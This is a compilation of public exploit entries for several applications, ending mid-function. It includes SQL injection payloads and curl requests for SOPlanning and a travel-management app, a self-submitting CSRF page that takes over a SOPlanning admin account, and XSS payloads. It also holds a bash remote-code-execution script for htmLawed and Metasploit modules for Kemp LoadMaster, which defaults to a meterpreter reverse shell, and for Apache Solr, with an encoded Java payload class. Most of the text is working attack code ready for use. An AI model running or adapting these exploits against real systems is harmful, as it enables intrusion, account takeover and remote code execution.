<pre><code>Exploit Title: SOPlanning v1.52.00 'projets.php' SQLi<br /><br />Application: SOPlanning<br /><br />Version: 1.52.00<br /><br />Date: 4/22/24<br /><br />Exploit Author: Joseph McPeters (Liquidsky)<br /><br />Vendor Homepage: https://www.soplanning.org/en/<br /><br />Software Link: https://sourceforge.net/projects/soplanning/<br /><br />Tested on: Linux<br /><br />CVE: Not yet assigned<br /><br />Description: SOPlanning v1.52.00 is vulnerable to Authenticated SQL Injection via the 'projects.php' page.<br /><br />Instructions: Authenticate to the host, the credentials can be obtained using a CSRF exploit (more info included). Once valid credentials are obtained use either a GET/POST request to send the valid parameters that equal to valid SQLi.<br /><br />Vulnerable request parameters for request to "/www/projets.php":<br /><br />filtreGroupeProjet=1&statut[]=todo'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+'Liquidsky'='Liquidsky&rechercheProjet=test<br /><br />The above parameters can be sent as either a valid GET/POST request to trigger the SQLi.<br /><br />Example Curl Request To Re-Test SQLi:<br /><br />curl -i -s -k -X $'POST' \<br /> -H $'Host: 127.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 130' -H $'Origin: http://127.0.0.1<http://127.0.0.1/>' -H $'Connection: close' -H $'Referer: http://127.0.0.1/soplanning/www/projets.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' \<br /> -b $'dateDebut=23/04/2024; dateFin=23/06/2024; xposMoisWin=0; xposJoursWin=0; yposMoisWin=0; yposJoursWin=0; yposProjets=33; PHPSESSID=ovpbclvbc87uh7anfbq2luf9bi; soplanningplanning_=hhrtf0rgs562vm8rhn5i641481; baseLigne=users; baseColonne=jours; afficherTableauRecap=1; masquerLigneVide=0; statut_projet=%5B%22abort%22%2C%22archive%22%2C%22done%22%2C%22progress%22%2C%22todo%22%5D' \<br /> --data-binary $'filtreGroupeProjet=1&statut[]=todo\'+AND+(SELECT+8073+FROM+(SELECT(SLEEP(10)))PuxA)+AND+\'Liquidsky\'=\'Liquidsky&rechercheProjet=test' \<br /> $'http://127.0.0.1/soplanning/www/projets.php'<br /><br /><br /> Note: Cookies need to be authenticated and request needs to be valid for valid SQLi. This curl request can be used with a proxy to reconstruct a valid request.<br /><br /><br /><br /><br /></code></pre>
<pre><code><!--<br />Exploit Title: SOPlanning v1.52.00 'xajax_server.php' CSRF (Account Takeover)<br />Application: SOPlanning<br />Version: 1.52.00<br />Date: 4/22/24<br />Exploit Author: Joseph McPeters (Liquidsky)<br />Vendor Homepage: https://www.soplanning.org/en/<br />Software Link: https://sourceforge.net/projects/soplanning/<br />Tested on: Linux<br />CVE: Not yet assigned<br /><br />Description: SOPlanning v1.52.00 is vulnerable to CSRF via 'xajax_server.php' a remote unautheticated attacker can hijack the admin account. The remote attacker can force the admins browser to make requests by sending them to an external page and update the admins password and email therefore taking over the admin panel.<br /><br />Instructions: Host the exploit code included and have the admin visit the CSRF exploit page while logged in. It will be noticed that the password and email for the main admin have been changed to the specified email and password.<br /><br />Liquidsky @ Specialized Security Services Inc. (S3) | Shout out to the team!<br />--><br /><br /><html><br /> <body><br /> <form action=https://fuzzlove.website/www/process/xajax_server.php method="POST"><br /> <input type="hidden" name="xajax" value="submitFormProfil" /><br /> <input type="hidden" name="xajaxr" value="" /><br /> <input type="hidden" name="xajaxargs[]" value="ADM" /><br /><!-- Update with attack email to change the admins email to yours --><br /> <input type="hidden" name="xajaxargs[]" value=pwn@mail.lv<mailto:pwn@mail.lv> /><br /><!-- Update the following field to change the admins password to the password in the field --><br /> <input type="hidden" name="xajaxargs[]" value="password" /><br /> <input type="hidden" name="xajaxargs[]" value="fr" /><br /> <input type="hidden" name="xajaxargs[]" value="true" /><br /> <input type="hidden" name="xajaxargs[]" value="false" /><br /> <input type="hidden" name="xajaxargs[]" value="true" /><br /> <input type="hidden" name="xajaxargs[]" value="true" /><br /> <input type="hidden" name="xajaxargs[]" value="true" /><br /> <input type="hidden" name="xajaxargs[]" value="false" /><br /> <input type="hidden" name="xajaxargs[]" value="0" /><br /> <input type="hidden" name="xajaxargs[]" value="1" /><br /> </form><br /> <script><br /> document.forms[0].submit();<br /> </script><br /> </body><br /></html><br /><br /><br /><br /></code></pre>
<pre><code>Exploit Title: SOPlanning v1.52.00 'groupe_save.php' XSS (Reflected XSS)<br />Application: SOPlanning<br />Version: 1.52.00<br />Date: 4/22/24<br />Exploit Author: Joseph McPeters (Liquidsky)<br />Vendor Homepage: https://www.soplanning.org/en/<br />Software Link: https://sourceforge.net/projects/soplanning/<br />Tested on: Linux<br />CVE: Not yet assigned<br /><br />Description: SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.<br /><br />Example Payload:<br />"><script>alert('LiQUiDSKY')</script><!--<br /><br />Reflected XSS: /soplanning/www/process/groupe_save.php?saved=1&groupe_id="><script>alert('LiQUiDSKY')</script><!--&nom=Project+New<br /><br />Analysis: The landing page takes into consideration the user input then redirects to a page where the XSS is shown the payload included in the exploit, escapes the variable where it is held, and comments out the rest to perform a valid reflected XSS attack against any authenticated user the payload was sent to.<br /><br /><br /><br /><br /></code></pre>
<pre><code>#!/bin/bash<br /><br /># Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution<br /><br /># Date: 2024-05-02<br /># Exploit Author: Miguel Redondo (aka d4t4s3c)<br /># Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed<br /># Software Link: https://github.com/kesar/HTMLawed<br /># Version: <= 1.2.5<br /># Tested on: Linux<br /># Category: Web Application<br /># CVE: CVE-2022-35914<br /><br />while getopts ":u:c:" arg; do<br /> case ${arg} in<br /> u) url=${OPTARG}; let parameter_counter+=1 ;;<br /> c) cmd=${OPTARG}; let parameter_counter+=1 ;;<br /> esac<br />done<br /><br />if [ -z "${url}" ] || [ -z "${cmd}" ]; then<br /> echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"<br /> echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n"<br /> exit 1<br />else<br /> echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution"<br /> echo -e "\n[+] Executing Command: ${cmd}\n"<br /> cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\&nbsp; \[[0-9]+\] =\>' | sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/')<br /> echo -e "${cmd_output}\n"<br /> exit 0<br />fi<br /></code></pre>
<pre><code>## Titles: Travel-Manager-OTMSP-1.0 Multiple SQLi<br />## Author: nu11secur1ty<br />## Date: 05/01/2024<br />## Vendor: https://mayurik.com/<br />## Software: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The email parameter appears to be vulnerable to SQL injection attacks.<br />A single quote was submitted in the email parameter, and a database<br />error message was returned. Two single quotes were then submitted and<br />the error message disappeared. The attacker can get all information<br />from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: email (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=TIkpBNAj@burpcollaborator.net' AND (SELECT 8987<br />FROM(SELECT COUNT(*),CONCAT(0x717a716b71,(SELECT<br />(ELT(8987=8987,1))),0x7176717a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# DdfP&send_email=<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: email=TIkpBNAj@burpcollaborator.net';SELECT SLEEP(7)#&send_email=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=TIkpBNAj@burpcollaborator.net' AND (SELECT 9208<br />FROM (SELECT(SLEEP(7)))pkFu)# nfTm&send_email=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Travel-Manager-OTMSP-1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/05/travel-manager-otmsp-10-multiple-sqli.html)<br /><br />## Time spent:<br />00:35:00<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /> def flag_file<br /> return @flag_file unless @flag_file.nil?<br /><br /> @flag_file = '/tmp/' + Rex::Text.rand_text_alpha(5)<br /> end<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Kemp LoadMaster Unauthenticated Command Injection',<br /> 'Description' => %q{<br /> This module exploits an unauthenticated command injection vulnerability in<br /> Progress Kemp LoadMaster in the authorization header after vversion 7.2.48.1.<br /> The following versions are patched: 7.2.59.2 (GA), 7.2.54.8 (LTSF) and<br /> 7.2.48.10 (LTS).<br /> },<br /> 'Author' => [<br /> 'Dave Yesland with Rhino Security Labs',<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2024-1212'],<br /> ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/'],<br /> ['URL', 'https://kemptechnologies.com/kemp-load-balancers']<br /> ],<br /> 'DisclosureDate' => '2024-03-19',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],<br /> 'Reliability' => [ REPEATABLE_SESSION ]<br /> },<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Automatic', # Add logic to run the payload only once<br /> {<br /> 'Payload' => {<br /> 'Prepend' => "[ -f #{flag_file} ] || ( touch #{flag_file}; (sleep 60; rm #{flag_file})& ",<br /> 'Append' => ')',<br /> 'BadChars' => "\x3a\x27"<br /> }<br /> }<br /> ],<br /> [<br /> 'Do_Not_Prepend_Runonce_Code', # This will likely result in 2-3 sessions<br /> {<br /> 'Payload' => {<br /> 'BadChars' => "\x3a\x27"<br /> }<br /> }<br /> ]<br /> ],<br /> 'Default_target' => 0,<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',<br /> 'FETCH_WRITABLE_DIR' => '/tmp/',<br /> 'SSL' => true,<br /> 'RPORT' => 443<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'The URI path to LoadMaster', '/'])<br /> ])<br /> end<br /><br /> def exploit<br /> uri = normalize_uri(target_uri.path, 'access', 'set')<br /><br /> vprint_status('Sending payload...')<br /><br /> send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri,<br /> 'vars_get' =><br /> {<br /> 'param' => 'enableapi',<br /> 'value' => '1'<br /> },<br /> 'authorization' => basic_auth("';#{payload.encoded};echo '", Rex::Text.rand_text_alpha(rand(8..15))),<br /> 'verify' => false<br /> })<br /> end<br /><br /> def on_new_session(client)<br /> super<br /> print_good('Now background this session with "bg" and then run "resource run_progress_kemp_loadmaster_sudo_priv_esc_2024.rc" to get a root shell')<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} is vulnerable...")<br /><br /> uri = normalize_uri(target_uri.path, 'access', 'set')<br /><br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => uri,<br /> 'vars_get' => {<br /> 'param' => 'enableapi',<br /> 'value' => '1'<br /> },<br /> 'authorization' => basic_auth("'", Rex::Text.rand_text_alpha(rand(8..15))),<br /> 'verify' => false<br /> })<br /><br /> # No response from server<br /> unless res<br /> return CheckCode::Unknown<br /> end<br /><br /> # Check for specific error pattern in headers or body to confirm vulnerability<br /> if res.headers.to_s.include?('unexpected EOF while looking for matching') || res.body.include?('unexpected EOF while looking for matching')<br /> return CheckCode::Vulnerable<br /> else<br /> return CheckCode::Safe<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code># Application Name: Doctor Appointment Management System<br /># Software Link: [Download Link](https://phpgurukul.com/doctor-appointment-management-system-using-php-and-mysql/)<br /># Vendor Homepage: [Vendor Homepage](https://phpgurukul.com/)<br /># BuG: XsS<br /># BUG_Author: SoSPiro<br /># Version: 1.0<br /># CVE: CVE-2024-4293<br /><br />### Vulnerable code section:<br /><br />- `http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php`<br />- **`Lines 57-61`**<br /><br />- Parameter `$fdate=$_POST['fromdate'];` and `$tdate=$_POST['todate']`<br /> <br />```php<br /><?php<br />$fdate=$_POST['fromdate'];<br />$tdate=$_POST['todate'];<br />?><br /><h5 align="center" style="color:blue">Report from <?php echo $fdate?> to <?php echo $tdate?></h5><br /><br />```<br />- The lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks.<br /><br />### Vulnerability Description:<br /><br />- The Doctor Appointment Management System is susceptible to a Cross-Site Scripting (XSS) vulnerability. This vulnerability allows attackers to inject malicious scripts into web pages viewed by other users.<br /><br /><br /><br />### Proof of Concept (PoC)<br /><br />- Poc Video : [Video Link](https://drive.google.com/file/d/1X7OPM1_Sb-xeIZO8ZdXekLtinUqzVdLx/view?usp=sharing)<br /><br />- Poc Video2: [Video Link](https://drive.google.com/file/d/1V6TP9ecAGUbsLvupE_7aQ8lkn_h5Jm18/view?usp=sharing)<br /><br /><br />```http<br /><br />POST /Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates-reports-details.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 60<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/Doctor-Appointment-System_PHP/dams/doctor/appointment-bwdates.php<br />Cookie: PHPSESSID=n8jjbs917jtj52rags5p7ll9ff<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />X-PwnFox-Color: blue<br /><br />fromdate=<script>alert(1)</script>&todate=2024-04-18&submit=<br /><br />```<br /><br />- In this POST request, an attacker has included a script tag in the "fromdate" and "todate" field:<br /><br />`<script>alert(1)</script>`<br /><br />- Upon successful exploitation, an alert box containing the text "1" will be displayed on the victim's browser, indicating that the XSS vulnerability has been successfully exploited.<br /><br /><br />### Impact:<br /><br />- The impact of this vulnerability is significant. Attackers can exploit it to execute arbitrary JavaScript code within the context of the affected web page. This could lead to various malicious activities such as session hijacking, phishing attacks, or defacement of the website.<br /><br />### Reproduce:<br /><br />- [ -vuldb.com- ](https://vuldb.com/?id.262225)<br /><br />- [ -cve.org- ](https://www.cve.org/CVERecord?id=CVE-2024-4293)<br /><br />- [ -github- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss.md)<br /><br />- [ -github2- ](https://github.com/Sospiro014/zday1/blob/main/doctor_appointment_management_system_xss2.md)<br /></code></pre>
<pre><code># Exploit Title: ESET NOD32 Antivirus 17.1.11.0 - Unquoted Service Path<br /># Exploit Author: Milad Karimi (Ex3ptionaL)<br /># Exploit Date: 2024-04-27<br /># Contact: miladgrayhat@gmail.com<br /># Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL<br /># Vendor : https://www.eset.com<br /># Version : 17.1.11.0<br /># Tested on OS: Microsoft Windows 10 pro x64<br /><br /><br />About Unquoted Service Path :<br />==============================<br /><br />When a service is created whose executable path contains spaces and isn't<br />enclosed within quotes, leads to a vulnerability known as Unquoted Service<br />Path which allows a user to gain SYSTEM privileges.<br />(only if the vulnerable service is running with SYSTEM privilege level<br />which most of the time it is).<br /><br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET<br />Security\ekrn.exe<br /><br />C:\>sc qc ekrn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ekrn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"<br /> LOAD_ORDER_GROUP : Base<br /> TAG : 0<br /> DISPLAY_NAME : ESET Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Java<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Remote::HTTP::ApacheSolr<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Apache Solr Backup/Restore APIs RCE',<br /> 'Description' => %q{<br /> Apache Solr from 6.0.0 through 8.11.2, from 9.0.0 before 9.4.1 is affected by an Unrestricted Upload of File<br /> with Dangerous Type vulnerability which can result in remote code execution in the context of the user running<br /> Apache Solr. When Apache Solr creates a Collection, it will use a specific directory as the classpath and load<br /> some classes from it. The backup function of the Collection can export malicious class files uploaded by<br /> attackers to the directory, allowing Solr to load custom classes and create arbitrary Java code. Execution<br /> can further bypass the Java sandbox configured by Solr, ultimately causing arbitrary command execution.<br /> },<br /> 'Author' => [<br /> 'l3yx', # discovery<br /> 'jheysel-r7' # module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://xz.aliyun.com/t/13637?time__1311=mqmxnQ0QiQi%3DDtKDsD7md0%3DnxeqjghDMxTD'],<br /> [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/18919'],<br /> [ 'URL', 'https://github.com/vvmdx/Apache-Solr-RCE_CVE-2023-50386_POC'],<br /> [ 'CVE', '2023-50386']<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => %w[unix linux],<br /> 'Privileged' => false,<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => %w[unix linux],<br /> 'Arch' => ARCH_CMD<br /> }<br /> ]<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => "\x20"<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'FETCH_WRITABLE_DIR' => '/tmp/'<br /> },<br /> 'DisclosureDate' => '2024-02-24',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES],<br /> 'Reliability' => [ REPEATABLE_SESSION, ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RPORT(8983),<br /> OptString.new('USERNAME', [false, 'Solr username', 'solr']),<br /> OptString.new('PASSWORD', [false, 'Solr password']),<br /> OptString.new('TARGETURI', [false, 'Path to Solr', 'solr']),<br /> ]<br /> )<br /> end<br /><br /> # If authentication is used<br /> @auth_string = ''<br /><br /> def check<br /> print_status('Running check method')<br /> auth_res = solr_check_auth<br /> unless auth_res<br /> return CheckCode::Unknown('Authentication failed!')<br /> end<br /><br /> # convert to JSON<br /> ver_json = auth_res.get_json_document<br /> # get Solr version<br /> solr_version = Rex::Version.new(ver_json['lucene']['solr-spec-version'])<br /> print_status("Found Apache Solr #{solr_version}")<br /> # get OS version details<br /> @target_platform = ver_json['system']['name']<br /> target_arch = ver_json['system']['arch']<br /> target_osver = ver_json['system']['version']<br /> print_status("OS version is #{@target_platform} #{target_arch} #{target_osver}")<br /><br /> unless solr_version.between?(Rex::Version.new('6.0.0'), Rex::Version.new('8.11.2')) ||<br /> solr_version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.4.0'))<br /> return CheckCode::Safe('Running version of Solr is not vulnerable!')<br /> end<br /><br /> CheckCode::Appears("Found Apache Solr version: #{ver_json['lucene']['solr-spec-version']}")<br /> end<br /><br /> # This method returns the compiled byte code of the following class, SourceParser.java:<br /> #<br /> # package zk_backup_0.configs.confname;<br /> #<br /> # import sun.misc.Unsafe;<br /> # import java.io.BufferedReader;<br /> # import java.io.File;<br /> # import java.io.FileOutputStream;<br /> # import java.io.InputStreamReader;<br /> # import java.lang.reflect.Field;<br /> # import java.lang.reflect.Method;<br /> # import java.security.ProtectionDomain;<br /> # import java.util.Map;<br /> #<br /> #<br /> # public class SourceParser {<br /> #<br /> # static {<br /> # try {<br /> # Field unsafeField = Unsafe.class.getDeclaredField("theUnsafe");<br /> # unsafeField.setAccessible(true);<br /> # Unsafe unsafe = (Unsafe) unsafeField.get(null);<br /> # Module module = Object.class.getModule();<br /> # Class<?> currentClass = SourceParser.class;<br /> # long addr = unsafe.objectFieldOffset(Class.class.getDeclaredField("module"));<br /> # unsafe.getAndSetObject(currentClass, addr, module);<br /> #<br /> # String[] cmd = {"bash", "-c", "METASPLOIT_PAYLOAD" };<br /> # Class clz = Class.forName("java.lang.ProcessImpl");<br /> # Method method = clz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);<br /> # method.setAccessible(true);<br /> # Process process = (Process) method.invoke(clz, cmd, null, null, null, false);<br /> # } catch (Exception e) {<br /> # e.printStackTrace();<br /> # }<br /> # }<br /> # }<br /> def go_go_gadget(configuration1_name)<br /> gadget = ''<br /> gadget << 'yv66vgAAAD0AaQoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClW'<br /> gadget << 'BwAIAQAPc3VuL21pc2MvVW5zYWZlCAAKAQAJdGhlVW5zYWZlCgAMAA0HAA4MAA8AEAEAD2phdmEv'<br /> gadget << 'bGFuZy9DbGFzcwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZh'<br /> gadget << 'L2xhbmcvcmVmbGVjdC9GaWVsZDsKABIAEwcAFAwAFQAWAQAXamF2YS9sYW5nL3JlZmxlY3QvRmll'<br /> gadget << 'bGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgoAEgAYDAAZABoBAANnZXQBACYoTGphdmEvbGFuZy9P'<br /> gadget << 'YmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwoADAAcDAAdAB4BAAlnZXRNb2R1bGUBABQoKUxqYXZh'<br /> gadget << 'L2xhbmcvTW9kdWxlOwcAIAEAKXprX2JhY2t1cF8wL2NvbmZpZ3MvY29uZm5hbWUvU291cmNlUGFy'<br /> gadget << 'c2VyCAAiAQAGbW9kdWxlCgAHACQMACUAJgEAEW9iamVjdEZpZWxkT2Zmc2V0AQAcKExqYXZhL2xh'<br /> gadget << 'bmcvcmVmbGVjdC9GaWVsZDspSgoABwAoDAApACoBAA9nZXRBbmRTZXRPYmplY3QBADkoTGphdmEv'<br /> gadget << 'bGFuZy9PYmplY3Q7SkxqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsHACwBABBq'<br /> gadget << 'YXZhL2xhbmcvU3RyaW5nCAAuAQAEYmFzaAgAMAEAAi1jCAAyAQASTUVUQVNQTE9JVF9QQVlMT0FE'<br /> gadget << 'CAA0AQAVamF2YS5sYW5nLlByb2Nlc3NJbXBsCgAMADYMADcAOAEAB2Zvck5hbWUBACUoTGphdmEv'<br /> gadget << 'bGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7CAA6AQAFc3RhcnQHADwBABNbTGphdmEvbGFu'<br /> gadget << 'Zy9TdHJpbmc7BwA+AQANamF2YS91dGlsL01hcAcAQAEAJFtMamF2YS9sYW5nL1Byb2Nlc3NCdWls'<br /> gadget << 'ZGVyJFJlZGlyZWN0OwkAQgBDBwBEDABFAEYBABFqYXZhL2xhbmcvQm9vbGVhbgEABFRZUEUBABFM'<br /> gadget << 'amF2YS9sYW5nL0NsYXNzOwoADABIDABJAEoBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9s'<br /> gadget << 'YW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsK'<br /> gadget << 'AEwAEwcATQEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAoAQgBPDABQAFEBAAd2YWx1ZU9mAQAW'<br /> gadget << 'KFopTGphdmEvbGFuZy9Cb29sZWFuOwoATABTDABUAFUBAAZpbnZva2UBADkoTGphdmEvbGFuZy9P'<br /> gadget << 'YmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsHAFcBABFqYXZhL2xh'<br /> gadget << 'bmcvUHJvY2VzcwcAWQEAE2phdmEvbGFuZy9FeGNlcHRpb24KAFgAWwwAXAAGAQAPcHJpbnRTdGFj'<br /> gadget << 'a1RyYWNlAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEACDxjbGluaXQ+AQANU3RhY2tNYXBUYWJs'<br /> gadget << 'ZQEAClNvdXJjZUZpbGUBABFTb3VyY2VQYXJzZXIuamF2YQEADElubmVyQ2xhc3NlcwcAZQEAIWph'<br /> gadget << 'dmEvbGFuZy9Qcm9jZXNzQnVpbGRlciRSZWRpcmVjdAcAZwEAGGphdmEvbGFuZy9Qcm9jZXNzQnVp'<br /> gadget << 'bGRlcgEACFJlZGlyZWN0ACEAHwACAAAAAAACAAEABQAGAAEAXQAAAB0AAQABAAAABSq3AAGxAAAA'<br /> gadget << 'AQBeAAAABgABAAAADgAIAF8ABgABAF0AAAEaAAYACgAAAK8SBxIJtgALSyoEtgARKgG2ABfAAAdM'<br /> gadget << 'EgK2ABtNEh9OKxIMEiG2AAu2ACM3BCstFgQstgAnVwa9ACtZAxItU1kEEi9TWQUSMVM6BhIzuAA1'<br /> gadget << 'OgcZBxI5CL0ADFkDEjtTWQQSPVNZBRIrU1kGEj9TWQeyAEFTtgBHOggZCAS2AEsZCBkHCL0AAlkD'<br /> gadget << 'GQZTWQQBU1kFAVNZBgFTWQcDuABOU7YAUsAAVjoJpwAISyq2AFqxAAEAAACmAKkAWAACAF4AAABC'<br /> gadget << 'ABAAAAASAAgAEwANABQAFgAVABwAFgAfABcALAAYADUAGgBKABsAUQAcAHgAHQB+AB4ApgAhAKkA'<br /> gadget << 'HwCqACAArgAiAGAAAAAJAAL3AKkHAFgEAAIAYQAAAAIAYgBjAAAACgABAGQAZgBoBAk='<br /> gadget = Rex::Text.decode_base64(gadget)<br /> # Replace 'confname' with our randomized 8 character configuration name<br /> gadget.sub!('confname', configuration1_name)<br /> # Replace the placeholder payload with our packed payload which is prefixed with it's size.<br /> gadget.sub!("\x00\x12METASPLOIT_PAYLOAD", packed_payload(payload.encoded))<br /> end<br /><br /> def packed_payload(pload)<br /> "#{[pload.length].pack('n')}#{pload}"<br /> end<br /><br /> def create_zip<br /> zip_file = Rex::Zip::Archive.new<br /> directory_to_zip = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-50386', 'conf')<br /><br /> Dir.glob(File.join(directory_to_zip, '**', '*')).each do |file_path|<br /> if File.file?(file_path)<br /> relative_path = file_path.sub("#{directory_to_zip}/", '') # Get relative path<br /> file_contents = File.read(file_path)<br /> zip_file.add_file(relative_path, file_contents)<br /> elsif File.directory?(file_path)<br /> relative_path = file_path.sub("#{directory_to_zip}/", '') # Get relative path<br /> zip_file.add_file(relative_path, nil, recursive: true)<br /> end<br /> end<br /><br /> zip_file<br /> end<br /><br /> def upload_conf(file_name, zip_archive, conf_name)<br /> mime = Rex::MIME::Message.new<br /> mime.add_part(zip_archive, 'application/octet-stream', 'binary', "form-data; filename=\"#{file_name}\"")<br /><br /> res = solr_post({<br /> 'uri' => normalize_uri(target_uri.path, 'admin', 'configs'),<br /> 'method' => 'POST',<br /> 'ctype' => 'application/octet-stream',<br /> 'data' => zip_archive,<br /> 'auth' => @auth_string,<br /> 'vars_get' => {<br /> 'action' => 'UPLOAD',<br /> 'name' => conf_name<br /> }<br /> })<br /><br /> fail_with(Failure::UnexpectedReply, 'No response from the target') unless res<br /> fail_with(Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200<br /><br /> data = res.get_json_document<br /> if data.dig('responseHeader', 'status') == 0<br /> print_good('Uploaded configuration successfully')<br /> elsif 